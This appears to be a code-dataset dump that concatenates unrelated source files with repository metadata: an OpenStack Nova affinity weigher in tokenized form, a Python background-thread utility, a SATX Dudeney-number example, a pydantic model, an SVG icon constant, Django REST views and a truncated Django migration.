comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
string|'"""\nAffinity Weighers. Weigh hosts by the number of instances from a given host.\n\nAffinityWeigher implements the soft-affinity policy for server groups by\npreferring the hosts that has more instances from the given group.\n\nAntiAffinityWeigher implements the soft-anti-affinity policy for server groups\nby preferring the hosts that has less instances from the given group.\n\n"""'
newline|'\n'
name|'from'
name|'oslo_config'
name|'import'
name|'cfg'
newline|'\n'
name|'from'
name|'oslo_log'
name|'import'
name|'log'
name|'as'
name|'logging'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
op|'.'
name|'i18n'
name|'import'
name|'_LW'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'scheduler'
name|'import'
name|'weights'
newline|'\n'
nl|'\n'
DECL|variable|CONF
name|'CONF'
op|'='
name|'cfg'
op|'.'
name|'CONF'
newline|'\n'
nl|'\n'
DECL|variable|LOG
name|'LOG'
op|'='
name|'logging'
op|'.'
name|'getLogger'
op|'('
name|'__name__'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|_SoftAffinityWeigherBase
name|'class'
name|'_SoftAffinityWeigherBase'
op|'('
name|'weights'
op|'.'
name|'BaseHostWeigher'
op|')'
op|':'
newline|'\n'
DECL|variable|policy_name
indent|' '
name|'policy_name'
op|'='
name|'None'
newline|'\n'
nl|'\n'
DECL|member|_weigh_object
name|'def'
name|'_weigh_object'
op|'('
name|'self'
op|','
name|'host_state'
op|','
name|'request_spec'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Higher weights win."""'
newline|'\n'
name|'if'
name|'not'
name|'request_spec'
op|'.'
name|'instance_group'
op|':'
newline|'\n'
indent|' '
name|'return'
number|'0'
newline|'\n'
nl|'\n'
dedent|''
name|'policies'
op|'='
name|'request_spec'
op|'.'
name|'instance_group'
op|'.'
name|'policies'
newline|'\n'
nl|'\n'
name|'if'
name|'self'
op|'.'
name|'policy_name'
name|'not'
name|'in'
name|'policies'
op|':'
newline|'\n'
indent|' '
name|'return'
number|'0'
newline|'\n'
nl|'\n'
dedent|''
name|'instances'
op|'='
name|'set'
op|'('
name|'host_state'
op|'.'
name|'instances'
op|'.'
name|'keys'
op|'('
op|')'
op|')'
newline|'\n'
name|'members'
op|'='
name|'set'
op|'('
name|'request_spec'
op|'.'
name|'instance_group'
op|'.'
name|'members'
op|')'
newline|'\n'
name|'member_on_host'
op|'='
name|'instances'
op|'.'
name|'intersection'
op|'('
name|'members'
op|')'
newline|'\n'
nl|'\n'
name|'return'
name|'len'
op|'('
name|'member_on_host'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ServerGroupSoftAffinityWeigher
dedent|''
dedent|''
name|'class'
name|'ServerGroupSoftAffinityWeigher'
op|'('
name|'_SoftAffinityWeigherBase'
op|')'
op|':'
newline|'\n'
DECL|variable|policy_name
indent|' '
name|'policy_name'
op|'='
string|"'soft-affinity'"
newline|'\n'
DECL|variable|warning_sent
name|'warning_sent'
op|'='
name|'False'
newline|'\n'
nl|'\n'
DECL|member|weight_multiplier
name|'def'
name|'weight_multiplier'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
op|'('
name|'CONF'
op|'.'
name|'soft_affinity_weight_multiplier'
op|'<'
number|'0'
name|'and'
nl|'\n'
name|'not'
name|'self'
op|'.'
name|'warning_sent'
op|')'
op|':'
newline|'\n'
indent|' '
name|'LOG'
op|'.'
name|'warn'
op|'('
name|'_LW'
op|'('
string|"'For the soft_affinity_weight_multiplier only a '"
nl|'\n'
string|"'positive value is meaningful as a negative value '"
nl|'\n'
string|"'would mean that the affinity weigher would '"
nl|'\n'
string|"'prefer non-collocating placement.'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'warning_sent'
op|'='
name|'True'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'CONF'
op|'.'
name|'soft_affinity_weight_multiplier'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ServerGroupSoftAntiAffinityWeigher
dedent|''
dedent|''
name|'class'
name|'ServerGroupSoftAntiAffinityWeigher'
op|'('
name|'_SoftAffinityWeigherBase'
op|')'
op|':'
newline|'\n'
DECL|variable|policy_name
indent|' '
name|'policy_name'
op|'='
string|"'soft-anti-affinity'"
newline|'\n'
DECL|variable|warning_sent
name|'warning_sent'
op|'='
name|'False'
newline|'\n'
nl|'\n'
DECL|member|weight_multiplier
name|'def'
name|'weight_multiplier'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
op|'('
name|'CONF'
op|'.'
name|'soft_anti_affinity_weight_multiplier'
op|'<'
number|'0'
name|'and'
nl|'\n'
name|'not'
name|'self'
op|'.'
name|'warning_sent'
op|')'
op|':'
newline|'\n'
indent|' '
name|'LOG'
op|'.'
name|'warn'
op|'('
name|'_LW'
op|'('
string|"'For the soft_anti_affinity_weight_multiplier only a '"
nl|'\n'
string|"'positive value is meaningful as a negative value '"
nl|'\n'
string|"'would mean that the anti-affinity weigher would '"
nl|'\n'
string|"'prefer collocating placement.'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'warning_sent'
op|'='
name|'True'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'CONF'
op|'.'
name|'soft_anti_affinity_weight_multiplier'
newline|'\n'
nl|'\n'
DECL|member|_weigh_object
dedent|''
name|'def'
name|'_weigh_object'
op|'('
name|'self'
op|','
name|'host_state'
op|','
name|'request_spec'
op|')'
op|':'
newline|'\n'
indent|' '
name|'weight'
op|'='
name|'super'
op|'('
name|'ServerGroupSoftAntiAffinityWeigher'
op|','
name|'self'
op|')'
op|'.'
name|'_weigh_object'
op|'('
nl|'\n'
name|'host_state'
op|','
name|'request_spec'
op|')'
newline|'\n'
name|'return'
op|'-'
number|'1'
op|'*'
name|'weight'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 16.161954 | 395 | 0.663273 |
7d853d0fb193fed74ab9e861c4ac08ed533ac101 | 4,303 | py | Python | ondevice/core/thread.py | ondevice/ondevice-client | a291f22827684f192a4f03e6fce3325527f30268 | [
"Linux-OpenIB"
] | 2 | 2016-08-02T15:32:19.000Z | 2016-08-25T08:51:50.000Z | ondevice/core/thread.py | ondevice/ondevice-python | a291f22827684f192a4f03e6fce3325527f30268 | [
"Linux-OpenIB"
] | 29 | 2016-07-08T06:56:06.000Z | 2016-11-09T22:59:44.000Z | ondevice/core/thread.py | ondevice/ondevice-client | a291f22827684f192a4f03e6fce3325527f30268 | [
"Linux-OpenIB"
] | null | null | null | from ondevice.core import state
import logging
import threading
import time
class ThreadInfo:
""" Stores some information on each BackgroundThread instance """
def __init__(self, **kwargs):
for key in 'id,name'.split(','):
if key not in kwargs:
raise KeyError("Missing required ThreadInfo attribute: '{0}' (got: {1})", key, kwargs.keys())
for k,v in kwargs.items():
setattr(self, k, v)
class BackgroundThread():
""" Thin wrapper around threading.Thread with simple event support.
    During the lifecycle of a background thread the following events may occur (roughly in that order):
- started: after a call to start()
- running: before target() is being executed
- stopping: after a call to stop()
- finished: after target() has finished
"""
def __init__(self, target, stopFn, name, args=(), kwargs={}):
""" Create a BackgroundThread object
- target: Thread function
- stopFn: Function to gracefully stop the thread function (`target`) - will be called when invoking .stop()
- name: Thread name (doesn't have to be unique)
- args: arguments to pass to target()
- kwargs: keyword arguments to pass to target() """
threadId = state.add('threads', 'seq', 1)
self.info = ThreadInfo(name=name, id=threadId)
self.target = target
self.stopFn = stopFn
self._listeners = {}
self._thread = threading.Thread(target=self.run, name=name, args=args, kwargs=kwargs)
def _emit(self, event, *args, **kwargs):
listeners = list(self._listeners[event]) if event in self._listeners else []
logging.debug("thread {0} fired event: {1} (args={2}, kwargs={3}, {4} listeners)".format(self.target, event, args, kwargs, len(listeners)))
for l in listeners:
l(*args, **kwargs)
def run(self):
""" Runs the target function (don't call this directly unless you want the target function be run in the current thread) """
#
state.add('threads', 'count', 1)
self.info.startedAt = time.time()
state.set('threads.info', self.info.id, self.info.__dict__)
self._emit('running')
try:
self.target()
finally:
self._emit('finished')
state.remove('threads.info', self.info.id)
state.add('threads', 'count', -1)
def addListener(self, event, fn):
if event not in ['started', 'running', 'stopping', 'finished']:
raise KeyError("Unsupported event: '{0}'".format(event))
        if event not in self._listeners:
self._listeners[event] = set()
self._listeners[event].add(fn)
def addListenerObject(self, obj):
""" Helper function to bind all signals to predefined methods of `obj` (if they exist)
- mainly used for testing """
fns = {'threadStarted': 'started', 'threadRunning':'running', 'threadStopping':'stopping', 'threadFinished':'finished'}
for fn,event in fns.items():
if hasattr(obj, fn):
self.addListener(event, getattr(obj, fn))
def removeListener(self, event, fn):
if event not in self._listeners:
            return # Can't remove something that isn't there
self._listeners[event].remove(fn)
def start(self):
self._thread.start()
self._emit('started')
def stop(self):
""" call the stopFn passed to the constructor and emit the 'stopping' signal """
self.stopFn()
self._emit('stopping')
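# A minimal usage sketch (illustrative only; `work` and `cancel_work` are placeholders
# for a real thread function and its stop hook):
#
#   thread = BackgroundThread(target=work, stopFn=cancel_work, name='worker')
#   thread.addListener('finished', lambda: logging.info('worker finished'))
#   thread.start()
#   ...
#   thread.stop()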
class FixedDelayTask(BackgroundThread):
""" Represents a repeating task that runs with a fixed delay (delay)
in a background thread """
def __init__(self, target, interval, name, *args, **kwargs):
self._target = target
self.interval = interval
self.args = args
self.kwargs = kwargs
self._event = threading.Event()
BackgroundThread.__init__(self, self._run, self._stop, name)
def _run(self):
while not self._event.wait(self.interval):
try:
self._target(*self.args, **self.kwargs)
except:
logging.exception('Exception in FixedDelayTask')
def _stop(self):
self._event.set()
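# FixedDelayTask usage sketch (illustrative only; `poll` is a placeholder callable
# that should run every 30 seconds until stop() is called):
#
#   task = FixedDelayTask(poll, 30, 'poller')
#   task.start()
#   ...
#   task.stop()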
| 36.777778 | 147 | 0.614223 |
c196cce761871f87a40c47cbc54baf6c2cdf3c5c | 1,108 | py | Python | examples/Dudeney.py | maxtuno/SATX | 68fc74a2b64c5c59a695724497d3327c47e6d152 | [
"MIT"
] | 4 | 2021-04-09T04:18:17.000Z | 2021-08-04T13:34:54.000Z | examples/Dudeney.py | maxtuno/SATX | 68fc74a2b64c5c59a695724497d3327c47e6d152 | [
"MIT"
] | null | null | null | examples/Dudeney.py | maxtuno/SATX | 68fc74a2b64c5c59a695724497d3327c47e6d152 | [
"MIT"
] | null | null | null | """
See https://en.wikipedia.org/wiki/Dudeney_number
In number theory, a Dudeney number in a given number base b is a natural number
equal to the perfect cube of another natural number such that the digit sum
of the first natural number is equal to the second.
The name derives from Henry Dudeney, who noted the existence of these numbers in one of his puzzles.
There are 5 non-trivial numbers for base 10, and the highest such number is formed of 5 digits.
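For example, 512 = 8**3 and 5 + 1 + 2 = 8, so 512 is a Dudeney number.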
Below, the model is given for base 10.
"""
from math import ceil
import satx
# for base 10
n_digits = 5
satx.engine((10 ** n_digits).bit_length(), cnf_path='aux.cnf')
# n is a (non-trivial) Dudeney number
n = satx.integer()
# s is the perfect cubic root of n
s = satx.integer()
# d[i] is the ith digit of the Dudeney number
d = satx.vector(size=n_digits)
satx.apply_single(d, lambda t: t < 10)
assert 2 <= n < 10 ** n_digits
assert s < ceil((10 ** n_digits) ** (1 / 3)) + 1
assert n == s * s * s
assert sum(d) == s
assert satx.dot(d, [10 ** (n_digits - i - 1) for i in range(n_digits)]) == n
while satx.satisfy('slime'):
print(n, s, d)
| 28.410256 | 100 | 0.702166 |
d4c715129502ceb90a0b93512f4465122a346b53 | 1,469 | py | Python | service/dao/model/job_seeker_answers.py | CyberArkForTheCommunity/jobli-backend | 2309c9ac33993cb89a8e1581630d99b46f8d55aa | [
"MIT"
] | null | null | null | service/dao/model/job_seeker_answers.py | CyberArkForTheCommunity/jobli-backend | 2309c9ac33993cb89a8e1581630d99b46f8d55aa | [
"MIT"
] | 1 | 2021-12-23T13:36:43.000Z | 2021-12-23T13:36:43.000Z | service/dao/model/job_seeker_answers.py | CyberArkForTheCommunity/jobli-backend | 2309c9ac33993cb89a8e1581630d99b46f8d55aa | [
"MIT"
] | null | null | null | from typing import Dict, Optional
from pydantic import BaseModel
from service.dao.single_table_service import DATA_DELIMITER, SingleTableRecord
JOB_SEEKER_ANSWERS_PK = "JOB_SEEKER_ANSWER"
JOB_SEEKER_ANSWERS_SK_PREFIX = "JOB_SEEKER_ID"
class JobSeekerAnswers(BaseModel, SingleTableRecord):
# def __init__(self, **kwargs):
# if 'version' not in kwargs:
# self.version = 0
# for attribute, value in kwargs.items():
# if hasattr(self, attribute):
# setattr(self, attribute, value)
job_seeker_id: str
job_seeker_name: str
a1: Optional[bool]
a2: Optional[bool]
a3: Optional[bool]
a4: Optional[bool]
a5: Optional[bool]
a6: Optional[bool]
a7: Optional[bool]
a8: Optional[bool]
a9: Optional[bool]
a10: Optional[bool]
creationTime: Optional[str]
lastUpdateTime: Optional[str]
version: int = 0
@staticmethod
def build_pk():
return JOB_SEEKER_ANSWERS_PK
@staticmethod
def build_sk(job_seeker_id: str):
return JOB_SEEKER_ANSWERS_SK_PREFIX + DATA_DELIMITER + job_seeker_id
def produce_pk(self) -> str:
return self.build_pk()
def produce_sk(self) -> str:
return self.build_sk(self.job_seeker_id)
def produce_gsi1_pk(self) -> Optional[str]:
return None
def produce_gsi1_sk(self) -> Optional[str]:
return None
def as_dict(self) -> Dict:
return self.__dict__
| 24.483333 | 78 | 0.667801 |
fbccf37b2928c34f99bf023df676379b0df0319c | 318 | py | Python | octicons16px/chevron_up.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | 1 | 2021-01-28T06:47:39.000Z | 2021-01-28T06:47:39.000Z | octicons16px/chevron_up.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | null | null | null | octicons16px/chevron_up.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | null | null | null |
OCTICON_CHEVRON_UP = """
<svg class="octicon octicon-chevron-up" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M3.22 9.78a.75.75 0 010-1.06l4.25-4.25a.75.75 0 011.06 0l4.25 4.25a.75.75 0 01-1.06 1.06L8 6.06 4.28 9.78a.75.75 0 01-1.06 0z"></path></svg>
"""
| 63.6 | 287 | 0.663522 |
98a0eaed0f150065563a1722aa39ccfa19f514ed | 1,495 | py | Python | {{cookiecutter.project_slug}}/usuario/api_views.py | claysllanxavier/django-cookiecutter | 97de7ff4ed3dc94c32bf756a57aee0664a888cbc | [
"BSD-3-Clause"
] | 8 | 2021-08-13T17:48:27.000Z | 2022-02-22T02:34:15.000Z | {{cookiecutter.project_slug}}/usuario/api_views.py | claysllanxavier/django-cookiecutter | 97de7ff4ed3dc94c32bf756a57aee0664a888cbc | [
"BSD-3-Clause"
] | 2 | 2022-03-24T20:39:00.000Z | 2022-03-24T20:39:48.000Z | {{cookiecutter.project_slug}}/usuario/api_views.py | claysllanxavier/django-cookiecutter | 97de7ff4ed3dc94c32bf756a57aee0664a888cbc | [
"BSD-3-Clause"
] | 2 | 2021-09-21T00:05:27.000Z | 2022-01-03T10:50:05.000Z | from drf_jsonmask.views import OptimizedQuerySetMixin
from rest_framework import filters
from rest_framework.viewsets import ModelViewSet, ReadOnlyModelViewSet
from rest_framework.decorators import permission_classes
from rest_framework.permissions import IsAuthenticated
from .serializers import UsuarioSerializer, UsuarioGETSerializer
from .models import Usuario
@permission_classes([IsAuthenticated, ])
class UsuarioViewAPI(ModelViewSet):
""" Classe para gerenciar as requisições da API para os métodos POST, PUT, PATCH e DELETE """
queryset = Usuario.objects.select_related().all()
serializer_class = UsuarioSerializer
@permission_classes([IsAuthenticated, ])
class UsuarioGETAPI(OptimizedQuerySetMixin, ReadOnlyModelViewSet):
""" Classe para gerenciar as requisições da API para o métodos GET
A lista filterset_fields deve ser configurada com os campos do models que poderão ser utilizados para realizar
filtros no models como por exemplo nome_do_campo=valor_a_ser_filtrado
A lista search_fields deve ser configurada com os campos do models que poderão ser utilizados para realizar
buscas no models como por exemplo search=valor_a_ser_pesquisado
"""
queryset = Usuario.objects.select_related().all()
serializer_class = UsuarioGETSerializer
filter_backend = [filters.SearchFilter]
# TODO Configure os parâmetros de filtro (filterset_fields) e buscar (search_fields)
filterset_fields = []
search_fields = []
| 42.714286 | 118 | 0.793311 |
05565ae2653798cde82cc12ea6174e172c4c360c | 25,053 | py | Python | symposion/conference/migrations/0001_initial.py | azkarmoulana/pycon | 931388e6f640c35b892bb4b2d12581ba7ec8cf4e | [
"BSD-3-Clause"
] | 154 | 2015-01-17T02:29:24.000Z | 2022-03-20T20:37:24.000Z | symposion/conference/migrations/0001_initial.py | azkarmoulana/pycon | 931388e6f640c35b892bb4b2d12581ba7ec8cf4e | [
"BSD-3-Clause"
] | 316 | 2015-01-10T04:01:50.000Z | 2020-09-30T20:18:08.000Z | symposion/conference/migrations/0001_initial.py | azkarmoulana/pycon | 931388e6f640c35b892bb4b2d12581ba7ec8cf4e | [
"BSD-3-Clause"
] | 89 | 2015-01-10T05:25:21.000Z | 2022-02-27T03:28:59.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import timezones.fields
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Conference',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=100, verbose_name='title')),
('start_date', models.DateField(null=True, verbose_name='start date', blank=True)),
('end_date', models.DateField(null=True, verbose_name='end date', blank=True)),
('timezone', timezones.fields.TimeZoneField(default=b'US/Eastern', max_length=100, verbose_name='timezone', blank=True, choices=[(b'Pacific/Midway', b'(GMT-1100) Pacific/Midway'), (b'Pacific/Niue', b'(GMT-1100) Pacific/Niue'), (b'Pacific/Pago_Pago', b'(GMT-1100) Pacific/Pago_Pago'), (b'Pacific/Honolulu', b'(GMT-1000) Pacific/Honolulu'), (b'Pacific/Johnston', b'(GMT-1000) Pacific/Johnston'), (b'Pacific/Rarotonga', b'(GMT-1000) Pacific/Rarotonga'), (b'Pacific/Tahiti', b'(GMT-1000) Pacific/Tahiti'), (b'US/Hawaii', b'(GMT-1000) US/Hawaii'), (b'Pacific/Marquesas', b'(GMT-0930) Pacific/Marquesas'), (b'America/Adak', b'(GMT-0900) America/Adak'), (b'Pacific/Gambier', b'(GMT-0900) Pacific/Gambier'), (b'America/Anchorage', b'(GMT-0800) America/Anchorage'), (b'America/Juneau', b'(GMT-0800) America/Juneau'), (b'America/Metlakatla', b'(GMT-0800) America/Metlakatla'), (b'America/Nome', b'(GMT-0800) America/Nome'), (b'America/Sitka', b'(GMT-0800) America/Sitka'), (b'America/Yakutat', b'(GMT-0800) America/Yakutat'), (b'Pacific/Pitcairn', b'(GMT-0800) Pacific/Pitcairn'), (b'US/Alaska', b'(GMT-0800) US/Alaska'), (b'America/Creston', b'(GMT-0700) America/Creston'), (b'America/Dawson', b'(GMT-0700) America/Dawson'), (b'America/Dawson_Creek', b'(GMT-0700) America/Dawson_Creek'), (b'America/Hermosillo', b'(GMT-0700) America/Hermosillo'), (b'America/Los_Angeles', b'(GMT-0700) America/Los_Angeles'), (b'America/Phoenix', b'(GMT-0700) America/Phoenix'), (b'America/Santa_Isabel', b'(GMT-0700) America/Santa_Isabel'), (b'America/Tijuana', b'(GMT-0700) America/Tijuana'), (b'America/Vancouver', b'(GMT-0700) America/Vancouver'), (b'America/Whitehorse', b'(GMT-0700) America/Whitehorse'), (b'Canada/Pacific', b'(GMT-0700) Canada/Pacific'), (b'US/Arizona', b'(GMT-0700) US/Arizona'), (b'US/Pacific', b'(GMT-0700) US/Pacific'), (b'America/Belize', b'(GMT-0600) America/Belize'), (b'America/Boise', b'(GMT-0600) America/Boise'), (b'America/Cambridge_Bay', b'(GMT-0600) America/Cambridge_Bay'), (b'America/Chihuahua', b'(GMT-0600) America/Chihuahua'), (b'America/Costa_Rica', b'(GMT-0600) America/Costa_Rica'), (b'America/Denver', b'(GMT-0600) America/Denver'), (b'America/Edmonton', b'(GMT-0600) America/Edmonton'), (b'America/El_Salvador', b'(GMT-0600) America/El_Salvador'), (b'America/Guatemala', b'(GMT-0600) America/Guatemala'), (b'America/Inuvik', b'(GMT-0600) America/Inuvik'), (b'America/Managua', b'(GMT-0600) America/Managua'), (b'America/Mazatlan', b'(GMT-0600) America/Mazatlan'), (b'America/Ojinaga', b'(GMT-0600) America/Ojinaga'), (b'America/Regina', b'(GMT-0600) America/Regina'), (b'America/Swift_Current', b'(GMT-0600) America/Swift_Current'), (b'America/Tegucigalpa', b'(GMT-0600) America/Tegucigalpa'), (b'America/Yellowknife', b'(GMT-0600) America/Yellowknife'), (b'Canada/Mountain', b'(GMT-0600) Canada/Mountain'), (b'Pacific/Galapagos', b'(GMT-0600) Pacific/Galapagos'), (b'US/Mountain', b'(GMT-0600) US/Mountain'), (b'America/Atikokan', b'(GMT-0500) America/Atikokan'), (b'America/Bahia_Banderas', b'(GMT-0500) America/Bahia_Banderas'), (b'America/Bogota', b'(GMT-0500) America/Bogota'), (b'America/Cancun', b'(GMT-0500) America/Cancun'), (b'America/Cayman', b'(GMT-0500) America/Cayman'), (b'America/Chicago', b'(GMT-0500) America/Chicago'), (b'America/Eirunepe', b'(GMT-0500) America/Eirunepe'), (b'America/Guayaquil', b'(GMT-0500) America/Guayaquil'), (b'America/Indiana/Knox', b'(GMT-0500) America/Indiana/Knox'), (b'America/Indiana/Tell_City', b'(GMT-0500) America/Indiana/Tell_City'), (b'America/Jamaica', b'(GMT-0500) 
America/Jamaica'), (b'America/Lima', b'(GMT-0500) America/Lima'), (b'America/Matamoros', b'(GMT-0500) America/Matamoros'), (b'America/Menominee', b'(GMT-0500) America/Menominee'), (b'America/Merida', b'(GMT-0500) America/Merida'), (b'America/Mexico_City', b'(GMT-0500) America/Mexico_City'), (b'America/Monterrey', b'(GMT-0500) America/Monterrey'), (b'America/North_Dakota/Beulah', b'(GMT-0500) America/North_Dakota/Beulah'), (b'America/North_Dakota/Center', b'(GMT-0500) America/North_Dakota/Center'), (b'America/North_Dakota/New_Salem', b'(GMT-0500) America/North_Dakota/New_Salem'), (b'America/Panama', b'(GMT-0500) America/Panama'), (b'America/Rainy_River', b'(GMT-0500) America/Rainy_River'), (b'America/Rankin_Inlet', b'(GMT-0500) America/Rankin_Inlet'), (b'America/Resolute', b'(GMT-0500) America/Resolute'), (b'America/Rio_Branco', b'(GMT-0500) America/Rio_Branco'), (b'America/Winnipeg', b'(GMT-0500) America/Winnipeg'), (b'Canada/Central', b'(GMT-0500) Canada/Central'), (b'Pacific/Easter', b'(GMT-0500) Pacific/Easter'), (b'US/Central', b'(GMT-0500) US/Central'), (b'America/Caracas', b'(GMT-0430) America/Caracas'), (b'America/Anguilla', b'(GMT-0400) America/Anguilla'), (b'America/Antigua', b'(GMT-0400) America/Antigua'), (b'America/Aruba', b'(GMT-0400) America/Aruba'), (b'America/Asuncion', b'(GMT-0400) America/Asuncion'), (b'America/Barbados', b'(GMT-0400) America/Barbados'), (b'America/Blanc-Sablon', b'(GMT-0400) America/Blanc-Sablon'), (b'America/Boa_Vista', b'(GMT-0400) America/Boa_Vista'), (b'America/Campo_Grande', b'(GMT-0400) America/Campo_Grande'), (b'America/Cuiaba', b'(GMT-0400) America/Cuiaba'), (b'America/Curacao', b'(GMT-0400) America/Curacao'), (b'America/Detroit', b'(GMT-0400) America/Detroit'), (b'America/Dominica', b'(GMT-0400) America/Dominica'), (b'America/Grand_Turk', b'(GMT-0400) America/Grand_Turk'), (b'America/Grenada', b'(GMT-0400) America/Grenada'), (b'America/Guadeloupe', b'(GMT-0400) America/Guadeloupe'), (b'America/Guyana', b'(GMT-0400) America/Guyana'), (b'America/Havana', b'(GMT-0400) America/Havana'), (b'America/Indiana/Indianapolis', b'(GMT-0400) America/Indiana/Indianapolis'), (b'America/Indiana/Marengo', b'(GMT-0400) America/Indiana/Marengo'), (b'America/Indiana/Petersburg', b'(GMT-0400) America/Indiana/Petersburg'), (b'America/Indiana/Vevay', b'(GMT-0400) America/Indiana/Vevay'), (b'America/Indiana/Vincennes', b'(GMT-0400) America/Indiana/Vincennes'), (b'America/Indiana/Winamac', b'(GMT-0400) America/Indiana/Winamac'), (b'America/Iqaluit', b'(GMT-0400) America/Iqaluit'), (b'America/Kentucky/Louisville', b'(GMT-0400) America/Kentucky/Louisville'), (b'America/Kentucky/Monticello', b'(GMT-0400) America/Kentucky/Monticello'), (b'America/Kralendijk', b'(GMT-0400) America/Kralendijk'), (b'America/La_Paz', b'(GMT-0400) America/La_Paz'), (b'America/Lower_Princes', b'(GMT-0400) America/Lower_Princes'), (b'America/Manaus', b'(GMT-0400) America/Manaus'), (b'America/Marigot', b'(GMT-0400) America/Marigot'), (b'America/Martinique', b'(GMT-0400) America/Martinique'), (b'America/Montserrat', b'(GMT-0400) America/Montserrat'), (b'America/Nassau', b'(GMT-0400) America/Nassau'), (b'America/New_York', b'(GMT-0400) America/New_York'), (b'America/Nipigon', b'(GMT-0400) America/Nipigon'), (b'America/Pangnirtung', b'(GMT-0400) America/Pangnirtung'), (b'America/Port-au-Prince', b'(GMT-0400) America/Port-au-Prince'), (b'America/Port_of_Spain', b'(GMT-0400) America/Port_of_Spain'), (b'America/Porto_Velho', b'(GMT-0400) America/Porto_Velho'), (b'America/Puerto_Rico', b'(GMT-0400) 
America/Puerto_Rico'), (b'America/Santo_Domingo', b'(GMT-0400) America/Santo_Domingo'), (b'America/St_Barthelemy', b'(GMT-0400) America/St_Barthelemy'), (b'America/St_Kitts', b'(GMT-0400) America/St_Kitts'), (b'America/St_Lucia', b'(GMT-0400) America/St_Lucia'), (b'America/St_Thomas', b'(GMT-0400) America/St_Thomas'), (b'America/St_Vincent', b'(GMT-0400) America/St_Vincent'), (b'America/Thunder_Bay', b'(GMT-0400) America/Thunder_Bay'), (b'America/Toronto', b'(GMT-0400) America/Toronto'), (b'America/Tortola', b'(GMT-0400) America/Tortola'), (b'Canada/Eastern', b'(GMT-0400) Canada/Eastern'), (b'US/Eastern', b'(GMT-0400) US/Eastern'), (b'America/Araguaina', b'(GMT-0300) America/Araguaina'), (b'America/Argentina/Buenos_Aires', b'(GMT-0300) America/Argentina/Buenos_Aires'), (b'America/Argentina/Catamarca', b'(GMT-0300) America/Argentina/Catamarca'), (b'America/Argentina/Cordoba', b'(GMT-0300) America/Argentina/Cordoba'), (b'America/Argentina/Jujuy', b'(GMT-0300) America/Argentina/Jujuy'), (b'America/Argentina/La_Rioja', b'(GMT-0300) America/Argentina/La_Rioja'), (b'America/Argentina/Mendoza', b'(GMT-0300) America/Argentina/Mendoza'), (b'America/Argentina/Rio_Gallegos', b'(GMT-0300) America/Argentina/Rio_Gallegos'), (b'America/Argentina/Salta', b'(GMT-0300) America/Argentina/Salta'), (b'America/Argentina/San_Juan', b'(GMT-0300) America/Argentina/San_Juan'), (b'America/Argentina/San_Luis', b'(GMT-0300) America/Argentina/San_Luis'), (b'America/Argentina/Tucuman', b'(GMT-0300) America/Argentina/Tucuman'), (b'America/Argentina/Ushuaia', b'(GMT-0300) America/Argentina/Ushuaia'), (b'America/Bahia', b'(GMT-0300) America/Bahia'), (b'America/Belem', b'(GMT-0300) America/Belem'), (b'America/Cayenne', b'(GMT-0300) America/Cayenne'), (b'America/Fortaleza', b'(GMT-0300) America/Fortaleza'), (b'America/Glace_Bay', b'(GMT-0300) America/Glace_Bay'), (b'America/Goose_Bay', b'(GMT-0300) America/Goose_Bay'), (b'America/Halifax', b'(GMT-0300) America/Halifax'), (b'America/Maceio', b'(GMT-0300) America/Maceio'), (b'America/Moncton', b'(GMT-0300) America/Moncton'), (b'America/Montevideo', b'(GMT-0300) America/Montevideo'), (b'America/Paramaribo', b'(GMT-0300) America/Paramaribo'), (b'America/Recife', b'(GMT-0300) America/Recife'), (b'America/Santarem', b'(GMT-0300) America/Santarem'), (b'America/Santiago', b'(GMT-0300) America/Santiago'), (b'America/Sao_Paulo', b'(GMT-0300) America/Sao_Paulo'), (b'America/Thule', b'(GMT-0300) America/Thule'), (b'Antarctica/Palmer', b'(GMT-0300) Antarctica/Palmer'), (b'Antarctica/Rothera', b'(GMT-0300) Antarctica/Rothera'), (b'Atlantic/Bermuda', b'(GMT-0300) Atlantic/Bermuda'), (b'Atlantic/Stanley', b'(GMT-0300) Atlantic/Stanley'), (b'Canada/Atlantic', b'(GMT-0300) Canada/Atlantic'), (b'America/St_Johns', b'(GMT-0230) America/St_Johns'), (b'Canada/Newfoundland', b'(GMT-0230) Canada/Newfoundland'), (b'America/Godthab', b'(GMT-0200) America/Godthab'), (b'America/Miquelon', b'(GMT-0200) America/Miquelon'), (b'America/Noronha', b'(GMT-0200) America/Noronha'), (b'Atlantic/South_Georgia', b'(GMT-0200) Atlantic/South_Georgia'), (b'Atlantic/Cape_Verde', b'(GMT-0100) Atlantic/Cape_Verde'), (b'Africa/Abidjan', b'(GMT+0000) Africa/Abidjan'), (b'Africa/Accra', b'(GMT+0000) Africa/Accra'), 